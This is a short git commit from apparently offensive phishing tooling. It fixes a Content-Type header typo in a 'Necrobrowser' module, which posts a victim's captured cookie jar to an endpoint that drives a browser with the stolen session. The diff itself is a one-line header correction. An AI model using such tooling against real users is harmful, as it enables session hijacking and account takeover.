fix necrobrowser wrong content-type

This commit is contained in:
Ohpe 2024-03-13 15:21:21 +01:00
parent 1631e41a2a
commit 21bfe2611d
No known key found for this signature in database

View file

@ -232,7 +232,7 @@ func (module *Necrobrowser) Instrument(victimID string, cookieJar []db.VictimCoo
module.Info("instrumenting %s", tui.Bold(tui.Red(victimID)))
client := resty.New()
resp, err := client.R().
SetHeader("Content-LandingType", "application/json").
SetHeader("Content-Type", "application/json").
SetBody(newRequest).
Post(module.Endpoint)